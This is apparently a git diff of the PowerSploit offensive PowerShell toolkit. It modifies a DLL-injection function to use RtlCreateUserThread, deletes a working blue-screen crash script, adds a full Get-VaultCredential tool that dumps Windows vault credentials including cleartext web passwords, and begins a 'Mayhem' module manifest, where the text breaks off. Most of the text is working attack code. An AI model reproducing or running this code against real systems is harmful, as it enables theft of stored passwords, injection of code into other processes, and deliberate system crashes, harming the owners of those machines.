diff options
| -rw-r--r-- | Capstone/Capstone.psm1 | 2 | ||||
| -rw-r--r-- | CodeExecution/CodeExecution.psd1 | 2 | ||||
| -rw-r--r-- | CodeExecution/Invoke-DllInjection.ps1 | 50 | ||||
| -rw-r--r-- | CodeExecution/Watch-BlueScreen.ps1 | 78 | ||||
| -rw-r--r-- | Exfiltration/Exfiltration.psd1 | 43 | ||||
| -rw-r--r-- | Exfiltration/Get-VaultCredential.ps1 | 401 | ||||
| -rw-r--r-- | Exfiltration/Get-VaultCredential.ps1xml | 37 | ||||
| -rw-r--r-- | Mayhem/Mayhem.psd1 | 87 | ||||
| -rw-r--r-- | Mayhem/Mayhem.psm1 | 99 | ||||
| -rw-r--r-- | Mayhem/Usage.md | 12 | ||||
| -rw-r--r-- | README.md | 16 |
11 files changed, 677 insertions, 150 deletions
diff --git a/Capstone/Capstone.psm1 b/Capstone/Capstone.psm1 index 6f55c1e..6507c54 100644 --- a/Capstone/Capstone.psm1 +++ b/Capstone/Capstone.psm1 @@ -1,5 +1,3 @@ -#Requires -Modules Capstone - function Get-CSDisassembly { <# diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1 index 07963fc..85258a5 100644 --- a/CodeExecution/CodeExecution.psd1 +++ b/CodeExecution/CodeExecution.psd1 @@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = # List of all files packaged with this module FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', - 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md' + 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Usage.md' # Private data to pass to the module specified in RootModule/ModuleToProcess # PrivateData = '' diff --git a/CodeExecution/Invoke-DllInjection.ps1 b/CodeExecution/Invoke-DllInjection.ps1 index 8395ab8..2d2019d 100644 --- a/CodeExecution/Invoke-DllInjection.ps1 +++ b/CodeExecution/Invoke-DllInjection.ps1 @@ -25,7 +25,7 @@ Name of the dll to inject. This can be an absolute or relative path. .EXAMPLE
-C:\PS> Invoke-DllInjection -ProcessID 4274 -Dll evil.dll
+Invoke-DllInjection -ProcessID 4274 -Dll evil.dll
Description
-----------
@@ -207,16 +207,13 @@ http://www.exploit-monday.com $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
$WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool])
$WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
- $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
- $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
- $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
+ $RtlCreateUserThreadAddr = Get-ProcAddress ntdll.dll RtlCreateUserThread
+ $RtlCreateUserThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Bool], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([UInt32])
+ $RtlCreateUserThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RtlCreateUserThreadAddr, $RtlCreateUserThreadDelegate)
$CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle
$CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])
$CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)
- # Assume CPU to be 64-bit unless determined otherwise.
- $64bitCPU = $True
-
# Determine the bitness of the running PowerShell process based upon the size of the IntPtr type.
if ([IntPtr]::Size -eq 4)
{
@@ -227,6 +224,14 @@ http://www.exploit-monday.com $PowerShell32bit = $False
}
+ $OSArchitecture = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
+
+ switch ($OSArchitecture)
+ {
+ '32-bit' { $64bitOS = $False }
+ '64-bit' { $64bitOS = $True }
+ }
+
# The address for IsWow64Process will be returned if and only if running on a 64-bit CPU. Otherwise, Get-ProcAddress will return $null.
$IsWow64ProcessAddr = Get-ProcAddress kernel32.dll IsWow64Process
@@ -235,23 +240,20 @@ http://www.exploit-monday.com $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
$IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
}
- else
- {
- # IsWow64Process does not exist and thus, the CPU is not 64-bit.
- $64bitCPU = $False
- }
+
+ $Architecture = Get-PEArchitecture $Dll
+
+ Write-Verbose "Architecture of the dll to be injected: $Architecture"
# Open a handle to the process you want to inject into
$hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF)
if (!$hProcess)
{
- THrow 'Unable to open process handle.'
+ Throw 'Unable to open process handle.'
}
- $Architecture = Get-PEArchitecture $Dll
-
- if ($64bitCPU) # Only perform theses checks if CPU is 64-bit
+ if ($64bitOS) # Only perform theses checks if OS is 64-bit
{
if ( ($Architecture -ne 'X86') -and ($Architecture -ne 'X64') )
{
@@ -293,7 +295,7 @@ http://www.exploit-monday.com $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Dll.Length, 0x3000, 4) # (0x3000 = Reserve|Commit, 4 = RW)
if ($RemoteMemAddr -eq [IntPtr]::Zero)
{
- Throw 'Unable to allocate memory in remote process.'
+ Throw 'Unable to allocate memory in remote process. Try running PowerShell elevated.'
}
Write-Verbose "DLL path memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))"
@@ -302,10 +304,10 @@ http://www.exploit-monday.com Write-Verbose "Dll path written sucessfully."
# Execute dll as a remote thread
- $ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $LoadLibraryAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)
- if (!$ThreadHandle)
+ $Result = $RtlCreateUserThread.Invoke($hProcess, [IntPtr]::Zero, $False, 0, [IntPtr]::Zero, [IntPtr]::Zero, $LoadLibraryAddr, $RemoteMemAddr, [IntPtr]::Zero, [IntPtr]::Zero)
+ if ($Result)
{
- Throw 'Unable to launch remote thread.'
+ Throw "Unable to launch remote thread. NTSTATUS: 0x$($Result.ToString('X8'))"
}
$VirtualFreeEx.Invoke($hProcess, $RemoteMemAddr, $Dll.Length, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
@@ -313,16 +315,16 @@ http://www.exploit-monday.com # Close process handle
$CloseHandle.Invoke($hProcess) | Out-Null
- Write-Verbose 'Dll injection complete!'
-
# Extract just the filename from the provided path to the dll.
$FileName = Split-Path $Dll -Leaf
- $DllInfo = (Get-Process -Id $ProcessID).Modules | ? { $_.FileName.Contains($FileName) } | fl * | Out-String
+ $DllInfo = (Get-Process -Id $ProcessID).Modules | ? { $_.FileName.Contains($FileName) }
if (!$DllInfo)
{
Throw "Dll did dot inject properly into the victim process."
}
- Write-Verbose "Injected DLL information:$($DllInfo)"
+ Write-Verbose 'Dll injection complete!'
+
+ $DllInfo
}
diff --git a/CodeExecution/Watch-BlueScreen.ps1 b/CodeExecution/Watch-BlueScreen.ps1 deleted file mode 100644 index 0a12a91..0000000 --- a/CodeExecution/Watch-BlueScreen.ps1 +++ /dev/null @@ -1,78 +0,0 @@ -function Watch-BlueScreen -{ -<# -.SYNOPSIS - - Cause a blue screen to occur (Windows 7 and below). - - PowerSploit Function: Watch-BlueScreen - Author: Matthew Graeber (@mattifestation) - Original Research: Tavis Ormandy and Nikita Tarakanov - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - -.NOTES - - Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov - ?tweeted this technique on 5/13/2013. - -.LINK - - https://gist.github.com/taviso/4658638 - http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html - https://twitter.com/NTarakanov/status/334031968465453057 -#> - [CmdletBinding( ConfirmImpact = 'High')] Param () - - try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException] - { - $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD') - $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run') - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False) - $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class') - - $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) - $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError') - $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'), - [Reflection.FieldInfo[]]@($SetLastError), @($true)) - - $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC', - 'Gdi32.dll', - 'Public, Static', - 'Standard', - [IntPtr], - @([IntPtr]), - 'Winapi', - 'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute) - - $TypeBuilder.DefinePInvokeMethod( 'SetLayout', - 'Gdi32.dll', - 'Public, Static', - 'Standard', - [UInt32], - @([IntPtr], [UInt32]), - 'Winapi', - 'Auto' ) | Out-Null - - $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx', - 'Gdi32.dll', - 'Public, Static', - 'Standard', - [Bool], - @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]), - 'Winapi', - 'Auto' ) | Out-Null - - $Gdi32 = $TypeBuilder.CreateType() - } - - $LAYOUT_RTL = 1 - - if ($psCmdlet.ShouldContinue( 'Do you want to continue?', 'You may want to save your work before continuing.' )) - { - $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero) - $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null - $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null - } -} diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1 index 2a5a152..6776b14 100644 --- a/Exfiltration/Exfiltration.psd1 +++ b/Exfiltration/Exfiltration.psd1 @@ -24,38 +24,8 @@ Description = 'PowerSploit Exfiltration Module' # Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'
-# Name of the Windows PowerShell host required by this module
-# PowerShellHostName = ''
-
-# Minimum version of the Windows PowerShell host required by this module
-# PowerShellHostVersion = ''
-
-# Minimum version of the .NET Framework required by this module
-# DotNetFrameworkVersion = ''
-
-# Minimum version of the common language runtime (CLR) required by this module
-# CLRVersion = ''
-
-# Processor architecture (None, X86, Amd64) required by this module
-# ProcessorArchitecture = ''
-
-# Modules that must be imported into the global environment prior to importing this module
-# RequiredModules = @()
-
-# Assemblies that must be loaded prior to importing this module
-# RequiredAssemblies = @()
-
-# Script files (.ps1) that are run in the caller's environment prior to importing this module.
-# ScriptsToProcess = ''
-
-# Type files (.ps1xml) to be loaded when importing this module
-# TypesToProcess = @()
-
# Format files (.ps1xml) to be loaded when importing this module
-# FormatsToProcess = @()
-
-# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
-# NestedModules = @()
+FormatsToProcess = 'Get-VaultCredential.ps1xml'
# Functions to export from this module
FunctionsToExport = '*'
@@ -76,15 +46,6 @@ ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
- 'VolumeShadowCopyTools.ps1'
-
-# Private data to pass to the module specified in RootModule/ModuleToProcess
-# PrivateData = ''
-
-# HelpInfo URI of this module
-# HelpInfoURI = ''
-
-# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
-# DefaultCommandPrefix = ''
+ 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml'
}
diff --git a/Exfiltration/Get-VaultCredential.ps1 b/Exfiltration/Get-VaultCredential.ps1 new file mode 100644 index 0000000..c830fa2 --- /dev/null +++ b/Exfiltration/Get-VaultCredential.ps1 @@ -0,0 +1,401 @@ +function Get-VaultCredential +{ +<# +.SYNOPSIS + +Displays Windows vault credential objects including cleartext web credentials. + +PowerSploit Function: Get-VaultCredential +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +Get-VaultCredential enumerates and displays all credentials stored in the Windows +vault. Web credentials, specifically are displayed in cleartext. This script was +inspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt + +.EXAMPLE + +Get-VaultCredential + +.NOTES + +Only web credentials can be displayed in cleartext. +#> + [CmdletBinding()] Param() + + $OSVersion = [Environment]::OSVersion.Version + $OSMajor = $OSVersion.Major + $OSMinor = $OSVersion.Minor + + #region P/Invoke declarations for vaultcli.dll + $DynAssembly = New-Object System.Reflection.AssemblyName('VaultUtil') + $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VaultUtil', $False) + + $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_ELEMENT_TYPE', 'Public', [Int32]) + $null = $EnumBuilder.DefineLiteral('Undefined', -1) + $null = $EnumBuilder.DefineLiteral('Boolean', 0) + $null = $EnumBuilder.DefineLiteral('Short', 1) + $null = $EnumBuilder.DefineLiteral('UnsignedShort', 2) + $null = $EnumBuilder.DefineLiteral('Int', 3) + $null = $EnumBuilder.DefineLiteral('UnsignedInt', 4) + $null = $EnumBuilder.DefineLiteral('Double', 5) + $null = $EnumBuilder.DefineLiteral('Guid', 6) + $null = $EnumBuilder.DefineLiteral('String', 7) + $null = $EnumBuilder.DefineLiteral('ByteArray', 8) + $null = $EnumBuilder.DefineLiteral('TimeStamp', 9) + $null = $EnumBuilder.DefineLiteral('ProtectedArray', 10) + $null = $EnumBuilder.DefineLiteral('Attribute', 11) + $null = $EnumBuilder.DefineLiteral('Sid', 12) + $null = $EnumBuilder.DefineLiteral('Last', 13) + $VAULT_ELEMENT_TYPE = $EnumBuilder.CreateType() + + $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_SCHEMA_ELEMENT_ID', 'Public', [Int32]) + $null = $EnumBuilder.DefineLiteral('Illegal', 0) + $null = $EnumBuilder.DefineLiteral('Resource', 1) + $null = $EnumBuilder.DefineLiteral('Identity', 2) + $null = $EnumBuilder.DefineLiteral('Authenticator', 3) + $null = $EnumBuilder.DefineLiteral('Tag', 4) + $null = $EnumBuilder.DefineLiteral('PackageSid', 5) + $null = $EnumBuilder.DefineLiteral('AppStart', 100) + $null = $EnumBuilder.DefineLiteral('AppEnd', 10000) + $VAULT_SCHEMA_ELEMENT_ID = $EnumBuilder.CreateType() + + $LayoutConstructor = [Runtime.InteropServices.StructLayoutAttribute].GetConstructor([Runtime.InteropServices.LayoutKind]) + $CharsetField = [Runtime.InteropServices.StructLayoutAttribute].GetField('CharSet') + $StructLayoutCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($LayoutConstructor, + @([Runtime.InteropServices.LayoutKind]::Explicit), + $CharsetField, + @([Runtime.InteropServices.CharSet]::Ansi)) + $StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + + $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM', $StructAttributes, [Object], [System.Reflection.Emit.PackingSize]::Size4) + $null = $TypeBuilder.DefineField('SchemaId', [Guid], 'Public') + $null = $TypeBuilder.DefineField('pszCredentialFriendlyName', [IntPtr], 'Public') + $null = $TypeBuilder.DefineField('pResourceElement', [IntPtr], 'Public') + $null = $TypeBuilder.DefineField('pIdentityElement', [IntPtr], 'Public') + $null = $TypeBuilder.DefineField('pAuthenticatorElement', [IntPtr], 'Public') + if ($OSMajor -ge 6 -and $OSMinor -ge 2) + { + $null = $TypeBuilder.DefineField('pPackageSid', [IntPtr], 'Public') + } + $null = $TypeBuilder.DefineField('LastModified', [UInt64], 'Public') + $null = $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public') + $null = $TypeBuilder.DefineField('dwPropertiesCount', [UInt32], 'Public') + $null = $TypeBuilder.DefineField('pPropertyElements', [IntPtr], 'Public') + $VAULT_ITEM = $TypeBuilder.CreateType() + + $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM_ELEMENT', $StructAttributes) + $TypeBuilder.SetCustomAttribute($StructLayoutCustomAttribute) + $null = $TypeBuilder.DefineField('SchemaElementId', $VAULT_SCHEMA_ELEMENT_ID, 'Public').SetOffset(0) + $null = $TypeBuilder.DefineField('Type', $VAULT_ELEMENT_TYPE, 'Public').SetOffset(8) + $VAULT_ITEM_ELEMENT = $TypeBuilder.CreateType() + + + $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.Vaultcli', 'Public, Class') + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultOpenVault', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([Guid].MakeByRefType(), + [UInt32], + [IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultCloseVault', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultFree', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([IntPtr]), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateVaults', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([Int32], + [Int32].MakeByRefType(), + [IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateItems', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([IntPtr], + [Int32], + [Int32].MakeByRefType(), + [IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + if ($OSMajor -ge 6 -and $OSMinor -ge 2) + { + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([IntPtr], + [Guid].MakeByRefType(), + [IntPtr], + [IntPtr], + [IntPtr], + [IntPtr], + [Int32], + [IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + } + else + { + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([IntPtr], + [Guid].MakeByRefType(), + [IntPtr], + [IntPtr], + [IntPtr], + [Int32], + [IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + } + + $Vaultcli = $TypeBuilder.CreateType() + #endregion + + # Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct. + function local:Get-VaultElementValue + { + Param ( + [ValidateScript({$_ -ne [IntPtr]::Zero})] + [IntPtr] + $VaultElementPtr + ) + + $PartialElement = [Runtime.InteropServices.Marshal]::PtrToStructure($VaultElementPtr, [Type] $VAULT_ITEM_ELEMENT) + $ElementPtr = [IntPtr] ($VaultElementPtr.ToInt64() + 16) + + switch ($PartialElement.Type) + { + $VAULT_ELEMENT_TYPE::String { + $StringPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr) + [Runtime.InteropServices.Marshal]::PtrToStringUni([IntPtr] $StringPtr) + } + + $VAULT_ELEMENT_TYPE::Boolean { + [Bool] [Runtime.InteropServices.Marshal]::ReadByte([IntPtr] $ElementPtr) + } + + $VAULT_ELEMENT_TYPE::Short { + [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr) + } + + $VAULT_ELEMENT_TYPE::UnsignedShort { + [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr) + } + + $VAULT_ELEMENT_TYPE::Int { + [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr) + } + + $VAULT_ELEMENT_TYPE::UnsignedInt { + [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr) + } + + $VAULT_ELEMENT_TYPE::Double { + [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Double]) + } + + $VAULT_ELEMENT_TYPE::Guid { + [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Guid]) + } + + $VAULT_ELEMENT_TYPE::Sid { + $SidPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr) + Write-Verbose "0x$($SidPtr.ToString('X8'))" + $SidObject = [Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr) + $SidObject.Value + } + + # These elements are currently unimplemented. + # I have yet to see these used in practice. + $VAULT_ELEMENT_TYPE::ByteArray { $null } + $VAULT_ELEMENT_TYPE::TimeStamp { $null } + $VAULT_ELEMENT_TYPE::ProtectedArray { $null } + $VAULT_ELEMENT_TYPE::Attribute { $null } + $VAULT_ELEMENT_TYPE::Last { $null } + } + } + + $VaultCount = 0 + $VaultGuidPtr = [IntPtr]::Zero + $Result = $Vaultcli::VaultEnumerateVaults(0, [Ref] $VaultCount, [Ref] $VaultGuidPtr) + + if ($Result -ne 0) + { + throw "Unable to enumerate vaults. Error (0x$($Result.ToString('X8')))" + } + + $GuidAddress = $VaultGuidPtr + + $VaultSchema = @{ + ([Guid] '2F1A6504-0641-44CF-8BB5-3612D865F2E5') = 'Windows Secure Note' + ([Guid] '3CCD5499-87A8-4B10-A215-608888DD3B55') = 'Windows Web Password Credential' + ([Guid] '154E23D0-C644-4E6F-8CE6-5069272F999F') = 'Windows Credential Picker Protector' + ([Guid] '4BF4C442-9B8A-41A0-B380-DD4A704DDB28') = 'Web Credentials' + ([Guid] '77BC582B-F0A6-4E15-4E80-61736B6F3B29') = 'Windows Credentials' + ([Guid] 'E69D7838-91B5-4FC9-89D5-230D4D4CC2BC') = 'Windows Domain Certificate Credential' + ([Guid] '3E0E35BE-1B77-43E7-B873-AED901B6275B') = 'Windows Domain Password Credential' + ([Guid] '3C886FF3-2669-4AA2-A8FB-3F6759A77548') = 'Windows Extended Credential' + ([Guid] '00000000-0000-0000-0000-000000000000') = $null + } + + if ($VaultCount) + { + foreach ($i in 1..$VaultCount) + { + $VaultGuid = [Runtime.InteropServices.Marshal]::PtrToStructure($GuidAddress, [Type] [Guid]) + $GuidAddress = [IntPtr] ($GuidAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] [Guid])) + + $VaultHandle = [IntPtr]::Zero + + Write-Verbose "Opening vault - $($VaultSchema[$VaultGuid]) ($($VaultGuid))" + + $Result = $Vaultcli::VaultOpenVault([Ref] $VaultGuid, 0, [Ref] $VaultHandle) + + if ($Result -ne 0) + { + Write-Error "Unable to open the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))" + continue + } + + $VaultItemCount = 0 + $VaultItemPtr = [IntPtr]::Zero + + $Result = $Vaultcli::VaultEnumerateItems($VaultHandle, 512, [Ref] $VaultItemCount, [Ref] $VaultItemPtr) + + if ($Result -ne 0) + { + $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle) + Write-Error "Unable to enumerate vault items from the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))" + continue + } + + $StructAddress = $VaultItemPtr + + if ($VaultItemCount) + { + foreach ($j in 1..$VaultItemCount) + { + $CurrentItem = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $VAULT_ITEM) + $StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $VAULT_ITEM)) + + $PasswordVaultItem = [IntPtr]::Zero + + if ($OSMajor -ge 6 -and $OSMinor -ge 2) + { + $Result = $Vaultcli::VaultGetItem($VaultHandle, + [Ref] $CurrentItem.SchemaId, + $CurrentItem.pResourceElement, + $CurrentItem.pIdentityElement, + $CurrentItem.pPackageSid, + [IntPtr]::Zero, + 0, + [Ref] $PasswordVaultItem) + } + else + { + $Result = $Vaultcli::VaultGetItem($VaultHandle, + [Ref] $CurrentItem.SchemaId, + $CurrentItem.pResourceElement, + $CurrentItem.pIdentityElement, + [IntPtr]::Zero, + 0, + [Ref] $PasswordVaultItem) + } + + $PasswordItem = $null + + if ($Result -ne 0) + { + Write-Error "Error occured retrieving vault item. Error (0x$($Result.ToString('X8')))" + continue + } + else + { + $PasswordItem = [Runtime.InteropServices.Marshal]::PtrToStructure($PasswordVaultItem, [Type] $VAULT_ITEM) + } + + if ($VaultSchema.ContainsKey($VaultGuid)) + { + $VaultType = $VaultSchema[$VaultGuid] + } + else + { + $VaultType = $VaultGuid + } + + if ($PasswordItem.pAuthenticatorElement -ne [IntPtr]::Zero) + { + $Credential = Get-VaultElementValue $PasswordItem.pAuthenticatorElement + } + else + { + $Credential = $null + } + + $PackageSid = $null + + if ($CurrentItem.pPackageSid -and ($CurrentItem.pPackageSid -ne [IntPtr]::Zero)) + { + $PackageSid = Get-VaultElementValue $CurrentItem.pPackageSid + } + + + $Properties = @{ + Vault = $VaultType + Resource = if ($CurrentItem.pResourceElement) { Get-VaultElementValue $CurrentItem.pResourceElement } else { $null } + Identity = if ($CurrentItem.pIdentityElement) { Get-VaultElementValue $CurrentItem.pIdentityElement } else { $null } + PackageSid = $PackageSid + Credential = $Credential + LastModified = [DateTime]::FromFileTimeUtc($CurrentItem.LastModified) + } + + $VaultItem = New-Object PSObject -Property $Properties + $VaultItem.PSObject.TypeNames[0] = 'VAULTCLI.VAULTITEM' + + $VaultItem + + $null = $Vaultcli::VaultFree($PasswordVaultItem) + } + } + + $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle) + } + } +}
\ No newline at end of file diff --git a/Exfiltration/Get-VaultCredential.ps1xml b/Exfiltration/Get-VaultCredential.ps1xml new file mode 100644 index 0000000..33e909f --- /dev/null +++ b/Exfiltration/Get-VaultCredential.ps1xml @@ -0,0 +1,37 @@ +<?xml version="1.0" encoding="utf-8" ?> +<Configuration> + <ViewDefinitions> + <View> + <Name>VaultItemView</Name> + <ViewSelectedBy> + <TypeName>VAULTCLI.VAULTITEM</TypeName> + </ViewSelectedBy> + <ListControl> + <ListEntries> + <ListEntry> + <ListItems> + <ListItem> + <PropertyName>Vault</PropertyName> + </ListItem> + <ListItem> + <PropertyName>Resource</PropertyName> + </ListItem> + <ListItem> + <PropertyName>Identity</PropertyName> + </ListItem> + <ListItem> + <PropertyName>Credential</PropertyName> + </ListItem> + <ListItem> + <PropertyName>PackageSid</PropertyName> + </ListItem> + <ListItem> + <PropertyName>LastModified</PropertyName> + </ListItem> + </ListItems> + </ListEntry> + </ListEntries> + </ListControl> + </View> + </ViewDefinitions> +</Configuration> diff --git a/Mayhem/Mayhem.psd1 b/Mayhem/Mayhem.psd1 new file mode 100644 index 0000000..82035d8 --- /dev/null +++ b/Mayhem/Mayhem.psd1 @@ -0,0 +1,87 @@ +@{ + +# Script module or binary module file associated with this manifest. +ModuleToProcess = 'Mayhem.psm1' + +# Version number of this module. +ModuleVersion = '1.0.0.0' + +# ID used to uniquely identify this module +GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c' + +# Author of this module +Author = 'Matthew Graeber' + +# Company or vendor of this module +CompanyName = '' + +# Copyright statement for this module +Copyright = 'BSD 3-Clause' + +# Description of the functionality provided by this module +Description = 'PowerSploit Mayhem Module' + +# Minimum version of the Windows PowerShell engine required by this module +PowerShellVersion = '2.0' + +# Name of the Windows PowerShell host required by this module +# PowerShellHostName = '' + +# Minimum version of the Windows PowerShell host required by this module +# PowerShellHostVersion = '' + +# Minimum version of the .NET Framework required by this module +# DotNetFrameworkVersion = '' + +# Minimum version of the common language runtime (CLR) required by this module +# CLRVersion = '' + +# Processor architecture (None, X86, Amd64) required by this module +# ProcessorArchitecture = '' + +# Modules that must be imported into the global environment prior to importing this module +# RequiredModules = @() + +# Assemblies that must be loaded prior to importing this module +# RequiredAssemblies = @() + +# Script files (.ps1) that are run 